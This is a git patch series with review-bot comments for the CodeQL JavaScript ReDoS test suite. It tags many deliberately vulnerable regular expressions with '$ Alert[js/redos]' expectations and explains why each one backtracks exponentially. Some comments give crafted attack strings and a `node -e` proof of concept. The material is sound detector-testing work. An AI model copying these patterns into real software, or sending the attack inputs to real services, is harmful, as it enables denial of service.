@@ -87,7 +87,7 @@ /^(?n:(?!-[\d\,]*K) (?!-((\d{1,3},)*((([3-9]\d\d|2[89]\d|27[4-9])\xB0C)|(((4[6-9]|[5-9]\d)\d)\xB0F)))) -?\d{1,3}(,\d{3})*(\xB0[CF]|K) )$/g; /^[+]447\d{9}$/g; /[1-2][0|9][0-9]{2}[0-1][0-9][0-3][0-9][-][0-9]{4}/g; -/^(([a-z])+.)+[A-Z]([a-z])+$/g; +/^(([a-z])+.)+[A-Z]([a-z])+$/g; // $ Alert[js/redos] /(?-i:\b\p{Lu}+\b)/g; /^(\d{5}((|-)-\d{4})?)|([A-Za-z]\d[A-Za-z][\s\.\-]?(|-)\d[A-Za-z]\d)|[A-Za-z]{1,2}\d{1,2}[A-Za-z]? \d[A-Za-z]{2}$/g; /(.*\.([wW][mM][aA])|([mM][pP][3])$)/g; @@ -120,7 +120,7 @@ /^(.|\n){0,16}$/g; /\p{N}/g; /^[a-zA-Z0-9]{1,20}$/g; -/(?s)(?:\e\[(?:(\d+);?)*([A-Za-z])(.*?))(?=\e\[|\z)/g; +/(?s)(?:\e\[(?:(\d+);?)*([A-Za-z])(.*?))(?=\e\[|\z)/g; // $ Alert[js/redos] /^[^#]([^ ]+ ){6}[^ ]+$/g; /^[AaWaKkNn][a-zA-Z]?[0-9][a-zA-Z]{1,3}$/g; /^[a-z]+[0-9]*[a-z]+$/g; @@ -139,13 +139,13 @@ /^[0-9]{2}[-][0-9]{2}[-][0-9]{2}$/g; /^\(?082|083|084|072\)?[\s-]?[\d]{3}[\s-]?[\d]{4}$/g; /(\{\\f\d*)\\([^;]+;)/g; -/^(\/w|\/W|[^<>+?$%{}&])+$/g; +/^(\/w|\/W|[^<>+?$%{}&])+$/g; // $ Alert[js/redos] /^\(\d{1,2}(\s\d{1,2}){1,2}\)\s(\d{1,2}(\s\d{1,2}){1,2})((-(\d{1,4})){0,1})$/g; /(("|')[a-z0-9\/\.\?\=\&]*(\.htm|\.asp|\.php|\.jsp)[a-z0-9\/\.\?\=\&]*("|'))|(href=*?[a-z0-9\/\.\?\=\&"']*)/g; /^]*)>(.*?(?=<\/a>))<\/a>$/g; /^[0-9A-Za-z_ ]+(.[jJ][pP][gG]|.[gG][iI][fF])$/g; /^(?(^00000(|-0000))|(\d{5}(|-\d{4})))$/g; -/\w?<\s?\/?[^\s>]+(\s+[^"'=]+(=("[^"]*")|('[^\']*')|([^\s"'>]*))?)*\s*\/?>/g; +/\w?<\s?\/?[^\s>]+(\s+[^"'=]+(=("[^"]*")|('[^\']*')|([^\s"'>]*))?)*\s*\/?>/g; // $ Alert[js/redos] /^([A-PR-UWYZ0-9][A-HK-Y0-9][AEHMNPRTVXY0-9]?[ABEHMNPRVWXY0-9]? {1,2}[0-9][ABD-HJLN-UW-Z]{2}|GIR 0AA)$/g; /^([ \u00c0-\u01ffa-zA-Z'])+$/g; /[^abc]/g; @@ -170,4 +170,4 @@ /(?-i:\b\p{Lu}+\b)/g; /^[+]447\d{9}$/g; /[1-2][0|9][0-9]{2}[0-1][0-9][0-3][0-9][-][0-9]{4}/g; -/^(([a-z])+.)+[A-Z]([a-z])+$/g; +/^(([a-z])+.)+[A-Z]([a-z])+$/g; // $ Alert[js/redos] 
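Review bot: `/^(([a-z])+.)+[A-Z]([a-z])+$/g` is the textbook case — inside `(…)+` the `.` also matches `[a-z]`, so a lowercase run followed by a character that fails the rest backtracks exponentially — and it is the same literal that tst.js names `bad10`; a cross-reference or the one-liner `// $ Alert[js/redos] - '.' overlaps [a-z] inside (…)+` would make the expectation self-explanatory. It is repeated verbatim in the last hunk of this file, so apply the remark to both copies.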
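Review bot: `/(?s)(?:\e\[(?:(\d+);?)*([A-Za-z])(.*?))(?=\e\[|\z)/g` uses `(?s)`, `\e` and `\z`, none of which JavaScript accepts (`(?s)` is a SyntaxError; `\e` and `\z` are at best identity escapes), so this is a .NET/PCRE ANSI-escape pattern and the js/redos result depends on how the CodeQL parser recovers from it. The part that would be exponential in an engine that ran it is `(?:(\d+);?)*`, where the `;` separator is optional so digit runs split arbitrarily; recording both facts next to the tag keeps the expectation honest. The same literal is tagged twice more in strings.js.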
diff --git a/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/regexplib/strings.js b/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/regexplib/strings.js index 888f1f5fb7dc..f4ebd5b8de9e 100644 --- a/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/regexplib/strings.js +++ b/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/regexplib/strings.js @@ -16,7 +16,7 @@ /^(?=[^\d_].*?\d)\w(\w|[!@#$%]){7,20}/g; /^([A-Z|a-z|&]{3}\d{2}((0[1-9]|1[012])(0[1-9]|1\d|2[0-8])|(0[13456789]|1[012])(29|30)|(0[13578]|1[02])31)|([02468][048]|[13579][26])0229)(\w{2})([A|a|0-9]{1})$|^([A-Z|a-z]{4}\d{2}((0[1-9]|1[012])(0[1-9]|1\d|2[0-8])|(0[13456789]|1[012])(29|30)|(0[13578]|1[02])31)|([02468][048]|[13579][26])0229)((\w{2})([A|a|0-9]{1})){0,3}$/g; /^((4\d{3})|(5[1-5]\d{2})|(6011))-?\d{4}-?\d{4}-?\d{4}|3[4,7]\d{13}$/g; -/^[\.\wæøå-]+@([a-zæøå0-9]+([\.-]{0,1}[a-zæøå0-9]+|[a-zæøå0-9]?))+\.[a-z]{2,6}$/g; +/^[\.\wæøå-]+@([a-zæøå0-9]+([\.-]{0,1}[a-zæøå0-9]+|[a-zæøå0-9]?))+\.[a-z]{2,6}$/g; // $ Alert[js/redos] /"((\\")|[^"(\\")])+"/g; /<[^>]+>/g; /^(?n:(?(St\.\ )?(?-i:[A-Z]\'?\w+?\-?)+)(?\ (?i:([JS]R)|((X(X{1,2})?)?((I((I{1,2})|V|X)?)|(V(I{0,3})))?)))?,((?Dr|Prof|M(r?|(is)?)s)\ )?(?(?-i:[A-Z]\'?(\w+?|\.)\ ??){1,2})?(\ (?(?-i:[A-Z])(\'?\w+?|\.))){0,2})$/g; 
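Review bot: In `/^[\.\wæøå-]+@([a-zæøå0-9]+([\.-]{0,1}[a-zæøå0-9]+|[a-zæøå0-9]?))+\.[a-z]{2,6}$/g` the outer `(…)+` wraps `[a-zæøå0-9]+` followed by an alternative whose separator is `{0,1}` or absent altogether, so every letter boundary is a possible iteration boundary and `x@aaaa…!` backtracks exponentially; the leading `[\.\wæøå-]+` is harmless because `@` is mandatory. Suggest `// $ Alert[js/redos] - separator inside (…)+ is optional` next to the tag so the expectation can be checked without re-deriving it.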
@@ -44,17 +44,17 @@ /^([4]{1})([0-9]{12,15})$/g; /^([34|37]{2})([0-9]{13})$/g; /^([A-Z]{3}\s?(\d{3}|\d{2}|d{1})\s?[A-Z])|([A-Z]\s?(\d{3}|\d{2}|\d{1})\s?[A-Z]{3})|(([A-HK-PRSVWY][A-HJ-PR-Y])\s?([0][2-9]|[1-9][0-9])\s?[A-HJ-PR-Z]{3})$/g; -/(\S*)+(\u007C)+(\S*)/g; +/(\S*)+(\u007C)+(\S*)/g; // $ Alert[js/redos] /([^\.\?\!]*)[\.\?\!]/g; /(\S+)\x20{2,}(?=\S+)/g; /^([6011]{4})([0-9]{12})$/g; /^([30|36|38]{2})([0-9]{12})$/g; /^(?!000)(?!666)(?[0-6]\d{2}|7(?:[0-6]\d|7[012]))([- ]?)(?!00)(?\d\d)\1(?!0000)(?\d{4})$/g; -/^([a-z0-9]+([\-a-z0-9]*[a-z0-9]+)?\.){0,}([a-z0-9]+([\-a-z0-9]*[a-z0-9]+)?){1,63}(\.[a-z0-9]{2,7})+$/g; +/^([a-z0-9]+([\-a-z0-9]*[a-z0-9]+)?\.){0,}([a-z0-9]+([\-a-z0-9]*[a-z0-9]+)?){1,63}(\.[a-z0-9]{2,7})+$/g; // $ Alert[js/redos] /(NOT)?(\s*\(*)\s*(\w+)\s*(=|<>|<|>|LIKE|IN)\s*(\(([^\)]*)\)|'([^']*)'|(-?\d*\.?\d+))(\s*\)*\s*)(AND|OR)?/g; /^[0-9]{1,}(,[0-9]+){0,}$/g; /^(?!^(PRN|AUX|CLOCK\$|NUL|CON|COM\d|LPT\d|\..*)(\..+)?$)[^\x00-\x1f\\?*<>:\;|\"/]+$/g; -/(?s)(?:\e\[(?:(\d+);?)*([A-Za-z])(.*?))(?=\e\[|\z)/g; +/(?s)(?:\e\[(?:(\d+);?)*([A-Za-z])(.*?))(?=\e\[|\z)/g; // $ Alert[js/redos] /^([1-9]{1}[0-9]{3}[,]?)*([1-9]{1}[0-9]{3})$/g; /^(?=((0[1-9]0)|([1-7][1-7]\d)|(00[1-9])|(0[1-9][1-9]))-(?=(([1-9]0)|(0[1-9])|([1-9][1-9]))-(?=((\d{3}[1-9])$|([1-9]\d{3})$|(\d[1-9]\d{2})$|(\d{2}[1-9]\d)$))))/g; /(\b\w+\b)/g; @@ -78,7 +78,7 @@ /^(\d{4}-){3}\d{4}$|^(\d{4} ){3}\d{4}$|^\d{16}$/g; /^(?[^,]+),(?[^,]+),(?[^,]+)$/g; /^(([a-h,A-H,j-n,J-N,p-z,P-Z,0-9]{9})([a-h,A-H,j-n,J-N,p,P,r-t,R-T,v-z,V-Z,0-9])([a-h,A-H,j-n,J-N,p-z,P-Z,0-9])(\d{6}))$/g; -/(?s)(?:\e\[(?:(\d+);?)*([A-Za-z])(.*?))(?=\e\[|\z)/g; +/(?s)(?:\e\[(?:(\d+);?)*([A-Za-z])(.*?))(?=\e\[|\z)/g; // $ Alert[js/redos] /(NOT)?(\s*\(*)\s*(\w+)\s*(=|<>|<|>|LIKE|IN)\s*(\(([^\)]*)\)|'([^']*)'|(-?\d*\.?\d+))(\s*\)*\s*)(AND|OR)?/g; /^[0-9]{1,}(,[0-9]+){0,}$/g; /^([4]{1})([0-9]{12,15})$/g; 
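Review bot: `/(\S*)+(\u007C)+(\S*)/g` is `(a*)+` in its purest form — `(\S*)+` lets any non-space run be split into arbitrarily many iterations, including empty ones — while `(\u007C)+` is just one or more `|`; the tag would be clearer as `// $ Alert[js/redos] - (\S*)+ nested star/plus`. `/^([a-z0-9]+([\-a-z0-9]*[a-z0-9]+)?\.){0,}…/` is the same shape with `{0,}` spelled instead of `*`: `[a-z0-9]+([\-a-z0-9]*[a-z0-9]+)?` overlaps with itself, so each label admits many parses before `\.` fails. The `(\S*)+` literal recurs in the last hunk of this file and the `(?s)` one in the `@@ -78` hunk, so the remarks belong on each copy.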
@@ -88,4 +88,4 @@ /([^\.\?\!]*)[\.\?\!]/g; /(\S+)\x20{2,}(?=\S+)/g; /^([A-Z]{3}\s?(\d{3}|\d{2}|d{1})\s?[A-Z])|([A-Z]\s?(\d{3}|\d{2}|\d{1})\s?[A-Z]{3})|(([A-HK-PRSVWY][A-HJ-PR-Y])\s?([0][2-9]|[1-9][0-9])\s?[A-HJ-PR-Z]{3})$/g; -/(\S*)+(\u007C)+(\S*)/g; +/(\S*)+(\u007C)+(\S*)/g; // $ Alert[js/redos] diff --git a/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/regexplib/uri.js b/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/regexplib/uri.js index 90d83b56ad3d..29ce77334563 100644 --- a/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/regexplib/uri.js +++ b/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/regexplib/uri.js 
@@ -1,8 +1,8 @@ /^(25[0-5]|2[0-4][0-9]|[0-1]{1}[0-9]{2}|[1-9]{1}[0-9]{1}|[1-9])\.(25[0-5]|2[0-4][0-9]|[0-1]{1}[0-9]{2}|[1-9]{1}[0-9]{1}|[1-9]|0)\.(25[0-5]|2[0-4][0-9]|[0-1]{1}[0-9]{2}|[1-9]{1}[0-9]{1}|[1-9]|0)\.(25[0-5]|2[0-4][0-9]|[0-1]{1}[0-9]{2}|[1-9]{1}[0-9]{1}|[0-9])$/g; /(http|ftp|https):\/\/[\w\-_]+(\.[\w\-_]+)+([\w\-\.,@?^=%&:/~\+#]*[\w\-\@?^=%&/~\+#])?/g; -/(?:(?http(?:s?)|ftp)(?:\:\/\/)) (?:(?\w+\:\w+)(?:\@))? (?[^/\r\n\:]+)? (?\:\d+)? (?(?:\/.*)*\/)? (?.*?\.(?\w{2,4}))? (?\??(?:\w+\=[^\#]+)(?:\&?\w+\=\w+)*)* (?\#.*)?/g; +/(?:(?http(?:s?)|ftp)(?:\:\/\/)) (?:(?\w+\:\w+)(?:\@))? (?[^/\r\n\:]+)? (?\:\d+)? (?(?:\/.*)*\/)? (?.*?\.(?\w{2,4}))? (?\??(?:\w+\=[^\#]+)(?:\&?\w+\=\w+)*)* (?\#.*)?/g; // $ Alert[js/redos] /^[^\\\/\?\*\"\'\>\<\:\|]*$/g; -/^(([a-zA-Z]:)|(\\{2}\w+)\$?)(\\(\w[\w ]*.*))+\.(txt|TXT)$/g; +/^(([a-zA-Z]:)|(\\{2}\w+)\$?)(\\(\w[\w ]*.*))+\.(txt|TXT)$/g; // $ Alert[js/redos] /(?!\.)[a-z]{1,4}$/g; /^([a-zA-Z]\:) (\\{1}| ((\\{1}) [^\\] ([^/:*?<>"|]*(?|]?$/g; -/^[a-z]+([a-z0-9-]*[a-z0-9]+)?(\.([a-z]+([a-z0-9-]*[a-z0-9]+)?)+)*$/g; +/^[a-z]+([a-z0-9-]*[a-z0-9]+)?(\.([a-z]+([a-z0-9-]*[a-z0-9]+)?)+)*$/g; // $ Alert[js/redos] /(.*?)<\/a>/g; /^[^\\\./:\*\?\"<>\|]{1}[^\\/:\*\?\"<>\|]{0,254}$/g; /^[a-zA-Z0-9]+([a-zA-Z0-9\-\.]+)?\.(aero|biz|com|coop|edu|gov|info|int|mil|museum|name|net|org|ac|ad|ae|af|ag|ai|al|am|an|ao|aq|ar|as|at|au|aw|az|ba|bb|bd|be|bf|bg|bh|bi|bj|bm|bn|bo|br|bs|bt|bv|bw|by|bz|ca|cc|cd|cf|cg|ch|ci|ck|cl|cm|cn|co|cr|cs|cu|cv|cx|cy|cz|de|dj|dk|dm|do|dz|ec|ee|eg|eh|er|es|et|fi|fj|fk|fm|fo|fr|ga|gb|gd|ge|gf|gg|gh|gi|gl|gm|gn|gp|gq|gr|gs|gt|gu|gw|gy|hk|hm|hn|hr|ht|hu|id|ie|il|im|in|io|iq|ir|is|it|je|jm|jo|jp|ke|kg|kh|ki|km|kn|kp|kr|kw|ky|kz|la|lb|lc|li|lk|lr|ls|lt|lu|lv|ly| ma|mc|md|mg|mh|mk|ml|mm|mn|mo|mp|mq|mr|ms|mt|mu|mv|mw|mx|my|mz|na|nc|ne|nf|ng|ni|nl|no|np|nr|nu|nz|om|pa|pe|pf|pg|ph|pk| pl|pm|pn|pr|ps|pt|pw|py|qa|re|ro|ru|rw|sa|sb|sc|sd|se|sg|sh|si|sj|sk|sl|sm|sn|so|sr| 
st|su|sv|sy|sz|tc|td|tf|tg|th|tj|tk|tm|tn|to|tp|tr|tt|tv|tw|tz|ua|ug|uk|um|us|uy|uz|va|vc|ve|vg|vi|vn|vu|wf|ws|ye|yt|yu|za|zm|zr|zw|AERO|BIZ|COM|COOP|EDU|GOV|INFO|INT|MIL|MUSEUM|NAME|NET|ORG|AC|/g; @@ -52,7 +52,7 @@ /9[0-9]/g; /([^\=&]+)(?|]?$/g; /^((\d|\d\d|[0-1]\d\d|2[0-4]\d|25[0-5])\.(\d|\d\d|[0-1]\d\d|2[0-4]\d|25[0-5])\.(\d|\d\d|[0-1]\d\d|2[0-4]\d|25[0-5])\.(\d|\d\d|[0-1]\d\d|2[0-4]\d|25[0-5]))$/g; /((http\:\/\/|https\:\/\/|ftp\:\/\/)|(www.))+(([a-zA-Z0-9\.-]+\.[a-zA-Z]{2,4})|([0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}))(\/[a-zA-Z0-9%:/-_\?\.'~]*)?/g; 
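Review bot: In `/^(([a-zA-Z]:)|(\\{2}\w+)\$?)(\\(\w[\w ]*.*))+\.(txt|TXT)$/g` the repeated group `(\\(\w[\w ]*.*))+` ends in `.*`, which can itself consume backslashes and the following segments, so `C:\a\b\c…` can be split between iterations in exponentially many ways before `\.txt$` fails; and in `/^[a-z]+([a-z0-9-]*[a-z0-9]+)?(\.([a-z]+([a-z0-9-]*[a-z0-9]+)?)+)*$/g` the inner `(\.…)+` is wrapped by an outer `(…)*`, so a run of `.label` segments can be grouped into iterations arbitrarily. A short remark naming these sub-patterns next to each tag would make the expectations reviewable. The first tagged line, `(?:(?http(?:s?)|ftp)…`, has its group names stripped and contains literal spaces, so it is not a JS literal and its alert is a parser-recovery result; worth saying so inline.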
@@ -60,7 +60,7 @@ /^(ht|f)tp((?<=http)s)?:\/\/((?<=http:\/\/)www|(?<=https:\/\/)www|(?<=ftp:\/\/)ftp)\.(([a-z][0-9])|([0-9][a-z])|([a-z0-9][a-z0-9\-]{1,2}[a-z0-9])|([a-z0-9][a-z0-9\-](([a-z0-9\-][a-z0-9])|([a-z0-9][a-z0-9\-]))[a-z0-9\-]*[a-z0-9]))\.(co|me|org|ltd|plc|net|sch|ac|mod|nhs|police|gov)\.uk$/g; /^DOMAIN\\\w+$/g; /^(http|https|ftp)\:\/\/([a-zA-Z0-9\.\-]+(\:[a-zA-Z0-9\.&%\$\-]+)*@)*((25[0-5]|2[0-4][0-9]|[0-1]{1}[0-9]{2}|[1-9]{1}[0-9]{1}|[1-9])\.(25[0-5]|2[0-4][0-9]|[0-1]{1}[0-9]{2}|[1-9]{1}[0-9]{1}|[1-9]|0)\.(25[0-5]|2[0-4][0-9]|[0-1]{1}[0-9]{2}|[1-9]{1}[0-9]{1}|[1-9]|0)\.(25[0-5]|2[0-4][0-9]|[0-1]{1}[0-9]{2}|[1-9]{1}[0-9]{1}|[0-9])|localhost|([a-zA-Z0-9\-]+\.)*[a-zA-Z0-9\-]+\.(com|edu|gov|int|mil|net|org|biz|arpa|info|name|pro|aero|coop|museum|[a-zA-Z]{2}))(\:[0-9]+)*(\/($|[a-zA-Z0-9\.\,\?\'\\\+&%\$#\=~_\-]+))*$/g; -/^(http|https|ftp)\:\/\/([a-zA-Z0-9\.\-]+(\:[a-zA-Z0-9\.&%\$\-]+)*@)?((25[0-5]|2[0-4][0-9]|[0-1]{1}[0-9]{2}|[1-9]{1}[0-9]{1}|[1-9])\.(25[0-5]|2[0-4][0-9]|[0-1]{1}[0-9]{2}|[1-9]{1}[0-9]{1}|[1-9]|0)\.(25[0-5]|2[0-4][0-9]|[0-1]{1}[0-9]{2}|[1-9]{1}[0-9]{1}|[1-9]|0)\.(25[0-5]|2[0-4][0-9]|[0-1]{1}[0-9]{2}|[1-9]{1}[0-9]{1}|[0-9])|([a-zA-Z0-9\-]+\.)*[a-zA-Z0-9\-]+\.[a-zA-Z]{2,4})(\:[0-9]+)?(\/[^/][a-zA-Z0-9\.\,\?\'\\/\+&%\$#\=~_\-@]*)*$/g; +/^(http|https|ftp)\:\/\/([a-zA-Z0-9\.\-]+(\:[a-zA-Z0-9\.&%\$\-]+)*@)?((25[0-5]|2[0-4][0-9]|[0-1]{1}[0-9]{2}|[1-9]{1}[0-9]{1}|[1-9])\.(25[0-5]|2[0-4][0-9]|[0-1]{1}[0-9]{2}|[1-9]{1}[0-9]{1}|[1-9]|0)\.(25[0-5]|2[0-4][0-9]|[0-1]{1}[0-9]{2}|[1-9]{1}[0-9]{1}|[1-9]|0)\.(25[0-5]|2[0-4][0-9]|[0-1]{1}[0-9]{2}|[1-9]{1}[0-9]{1}|[0-9])|([a-zA-Z0-9\-]+\.)*[a-zA-Z0-9\-]+\.[a-zA-Z]{2,4})(\:[0-9]+)?(\/[^/][a-zA-Z0-9\.\,\?\'\\/\+&%\$#\=~_\-@]*)*$/g; // $ Alert[js/redos] /^\\{2}[\w-]+\\(([\w-][\w-\s]*[\w-]+[$$]?$)|([\w-][$$]?$))/g; /(^[a-zA-Z0-9]+:\/\/)/g; /^http:\/\/([a-zA-Z0-9_\-]+)([\.][a-zA-Z0-9_\-]+)+([/][a-zA-Z0-9\~\(\)_\-]*)+([\.][a-zA-Z0-9\(\)_\-]+)*$/g; From 607b184a7f9ec468e617a832541afb7465fe887a Mon Sep 17 00:00:00 2001 
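Review bot: The tagged URL regex differs from the untagged one directly above it essentially in the path tail: `(\/[^/][a-zA-Z0-9\.\,\?\'\\/\+&%\$#\=~_\-@]*)*$` puts `/` inside the repeated class, so `/a/b/c…` can be consumed as one segment or several, whereas the sibling's `(\/($|[a-zA-Z0-9\.\,\?\'\\\+&%\$#\=~_\-]+))*$` excludes `/` and is unambiguous. That contrast is exactly what makes one a true positive and the other not, and is worth a remark on the tagged line, e.g. `// $ Alert[js/redos] - path class includes '/', unlike the line above`.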
From: Asger F Date: Fri, 21 Feb 2025 09:58:15 +0100 Subject: [PATCH 042/115] JS: Fix a bug in test case --- javascript/ql/test/query-tests/Security/CWE-400/ReDoS/tst.js | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/tst.js b/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/tst.js index 55b173b0f779..455db4f86e93 100644 --- a/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/tst.js +++ b/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/tst.js @@ -102,7 +102,7 @@ var bad24 = /(?:=(?:([!#\$%&'\*\+\-\.\^_`\|~0-9A-Za-z]+)|"((?:\\[\x00-\x7f]|[^\x var bad25 = /"((?:\\[\x00-\x7f]|[^\x00-\x08\x0a-\x1f\x7f"])*)"/; // $ Alert -var bad26 = /"((?:\\[\x00-\x7f]|[^\x00-\x08\x0a-\x1f\x7f"\\])*)"/; +var fix25 = /"((?:\\[\x00-\x7f]|[^\x00-\x08\x0a-\x1f\x7f"\\])*)"/; // OK - fixed version of bad25 var bad27 = /(([a-z]|[d-h])*)"/; // $ Alert From 082e16b3d31f679eaf4a31ef0bf776cf76328a88 Mon Sep 17 00:00:00 2001 From: Asger F Date: Fri, 21 Feb 2025 09:58:56 +0100 Subject: [PATCH 043/115] JS: More Alert comments in ReDoS/tst.js based on variable naming Again just trying to translate the original intent behind the test, without taking actual query results into account --- .../query-tests/Security/CWE-400/ReDoS/tst.js | 48 +++++++++---------- 1 file changed, 23 insertions(+), 25 deletions(-) diff --git a/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/tst.js b/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/tst.js index 455db4f86e93..735d45ea6cc1 100644 --- a/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/tst.js +++ b/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/tst.js 
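Review bot: Renaming `bad26` to `fix25` with `// OK - fixed version of bad25` is right, but the comment does not say what the fix is: the only difference from `bad25` is the added `\\` in the negated class, so a backslash can no longer be consumed by `[^…]` and must go through `\\[\x00-\x7f]`, which removes the overlap between the two alternatives of `(?:…)*`. Suggest `// OK - fixed version of bad25: '\\' excluded from the class, so the alternatives no longer overlap`. `fix25` is not referenced anywhere in the hunk, so the comment is the only place that intent is recorded.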
@@ -41,24 +41,22 @@ var good4 = /(\r\n|\r|\n)+/; // BAD - PoC: `node -e "/((?:[^\"\']|\".*?\"|\'.*?\')*?)([(,)]|$)/.test(\"'''''''''''''''''''''''''''''''''''''''''''''\\\"\");"`. It's complicated though, because the regexp still matches something, it just matches the empty-string after the attack string. var actuallyBad = /((?:[^"']|".*?"|'.*?')*?)([(,)]|$)/; -// NOT GOOD; attack: "a" + "[]".repeat(100) + ".b\n" // Adapted from Knockout (https://github.com/knockout/knockout), which is // licensed under the MIT license; see file knockout-LICENSE -var bad6 = /^[\_$a-z][\_$a-z0-9]*(\[.*?\])*(\.[\_$a-z][\_$a-z0-9]*(\[.*?\])*)*$/i; +var bad6 = /^[\_$a-z][\_$a-z0-9]*(\[.*?\])*(\.[\_$a-z][\_$a-z0-9]*(\[.*?\])*)*$/i; // $ Alert - attack: "a" + "[]".repeat(100) + ".b\n" var good6 = /(a|.)*/; // Testing the NFA - only some of the below are detected. -var bad7 = /^([a-z]+)+$/; -var bad8 = /^([a-z]*)*$/; -var bad9 = /^([a-zA-Z0-9])(([\\-.]|[_]+)?([a-zA-Z0-9]+))*(@){1}[a-z0-9]+[.]{1}(([a-z]{2,3})|([a-z]{2,3}[.]{1}[a-z]{2,3}))$/; -var bad10 = /^(([a-z])+.)+[A-Z]([a-z])+$/; +var bad7 = /^([a-z]+)+$/; // $ Alert +var bad8 = /^([a-z]*)*$/; // $ Alert +var bad9 = /^([a-zA-Z0-9])(([\\-.]|[_]+)?([a-zA-Z0-9]+))*(@){1}[a-z0-9]+[.]{1}(([a-z]{2,3})|([a-z]{2,3}[.]{1}[a-z]{2,3}))$/; // $ Alert +var bad10 = /^(([a-z])+.)+[A-Z]([a-z])+$/; // $ Alert -// NOT GOOD; attack: "[" + "][".repeat(100) + "]!" // Adapted from Prototype.js (https://github.com/prototypejs/prototype), which // is licensed under the MIT license; see file Prototype.js-LICENSE. -var bad11 = /(([\w#:.~>+()\s-]+|\*|\[.*?\])+)\s*(,|$)/; +var bad11 = /(([\w#:.~>+()\s-]+|\*|\[.*?\])+)\s*(,|$)/; // $ Alert - attack: "[" + "][".repeat(100) + "]!" // Adapted from Prism (https://github.com/PrismJS/prism), which is licensed // under the MIT license; see file Prism-LICENSE. 
@@ -279,11 +277,11 @@ var bad78 = /^(b+.)+$/; // $ Alert
 var good39 = /a*b/;
-// All 4 bad combinations of nested * and +
-var bad79 = /(a*)*b/;
-var bad80 = /(a+)*b/;
-var bad81 = /(a*)+b/;
-var bad82 = /(a+)+b/;
+// All 4 bad combinations of nested * and +)
+var bad79 = /(a*)*b/; // $ Alert
+var bad80 = /(a+)*b/; // $ Alert
+var bad81 = /(a*)+b/; // $ Alert
+var bad82 = /(a+)+b/; // $ Alert
 var good40 = /(a|b)+/;
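Review bot: The rewritten comment line `+// All 4 bad combinations of nested * and +)` picks up a stray closing parenthesis that the removed line did not have; the intended text is `// All 4 bad combinations of nested * and +`. PATCH 044 later carries the same typo forward as context, so correcting it here keeps that hunk clean as well.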
@@ -300,45 +298,45 @@ var bad86AndAHalf = /^((?:a{0,2}|-)|\w\{\d,\d\})+X$/; // $ MISSING: Alert var good43 = /("[^"]*?"|[^"\s]+)+(?=\s*|\s*$)/g; var bad87 = /("[^"]*?"|[^"\s]+)+(?=\s*|\s*$)X/g; // $ Alert -var bad88 = /("[^"]*?"|[^"\s]+)+(?=X)/g; -var bad89 = /(x*)+(?=$)/ -var bad90 = /(x*)+(?=$|y)/ +var bad88 = /("[^"]*?"|[^"\s]+)+(?=X)/g; // $ Alert +var bad89 = /(x*)+(?=$)/ // $ Alert +var bad90 = /(x*)+(?=$|y)/ // $ Alert // OK - but we spuriously conclude that a rejecting suffix exists. var good44 = /([\s\S]*)+(?=$)/; var good45 = /([\s\S]*)+(?=$|y)/; var good46 = /(foo|FOO)*bar/; -var bad91 = /(foo|FOO)*bar/i; +var bad91 = /(foo|FOO)*bar/i; // $ Alert var good47 = /([AB]|[ab])*C/; -var bad92 = /([DE]|[de])*F/i; +var bad92 = /([DE]|[de])*F/i; // $ Alert -var bad93 = /(?<=^v?|\sv?)(a|aa)*$/; -var bad94 = /(a|aa)*$/; +var bad93 = /(?<=^v?|\sv?)(a|aa)*$/; // $ Alert +var bad94 = /(a|aa)*$/; // $ Alert var bad95 = new RegExp( "(a" + "|" + "aa)*" + "b$" -); +); // $ Alert var bad96 = new RegExp("(" + "(c|cc)*|" + "(d|dd)*|" + "(e|ee)*" + -")f$"); +")f$"); // $ Alert var bad97 = new RegExp( "(g|gg" + - ")*h$"); + ")*h$"); // $ Alert -var bad98 = /^(?:\*\/\*|[a-zA-Z0-9][a-zA-Z0-9!\#\$&\-\^_\.\+]{0,126}\/(?:\*|[a-zA-Z0-9][a-zA-Z0-9!\#\$&\-\^_\.\+]{0,126})(?:\s* *; *[a-zA-Z0-9][a-zA-Z0-9!\#\$&\-\^_\.\+]{0,126}(?:="?[a-zA-Z0-9][a-zA-Z0-9!\#\$&\-\^_\.\+]{0,126}"?)?\s*)*)$/; +var bad98 = /^(?:\*\/\*|[a-zA-Z0-9][a-zA-Z0-9!\#\$&\-\^_\.\+]{0,126}\/(?:\*|[a-zA-Z0-9][a-zA-Z0-9!\#\$&\-\^_\.\+]{0,126})(?:\s* *; *[a-zA-Z0-9][a-zA-Z0-9!\#\$&\-\^_\.\+]{0,126}(?:="?[a-zA-Z0-9][a-zA-Z0-9!\#\$&\-\^_\.\+]{0,126}"?)?\s*)*)$/; // $ Alert var good48 = /(\/(?:\/[\w.-]*)*){0,1}:([\w.-]+)/; -var bad99 = /(a{1,})*b/; +var bad99 = /(a{1,})*b/; // $ Alert var unicode = /^\n\u0000(\u0000|.)+$/; From 266ac0963773318799a6ac9429de8b643ddf327e Mon Sep 17 00:00:00 2001 
From: Asger F
Date: Fri, 21 Feb 2025 14:29:18 +0100
Subject: [PATCH 044/115] JS: Add query iDs
---
 .../query-tests/Security/CWE-400/ReDoS/tst.js | 194 +++++++++---------
 1 file changed, 97 insertions(+), 97 deletions(-)
diff --git a/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/tst.js b/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/tst.js
index 735d45ea6cc1..6be96967a643 100644
--- a/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/tst.js
+++ b/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/tst.js
@@ -1,6 +1,6 @@
 // Adapted from marked (https://github.com/markedjs/marked), which is licensed
 // under the MIT license; see file marked-LICENSE.
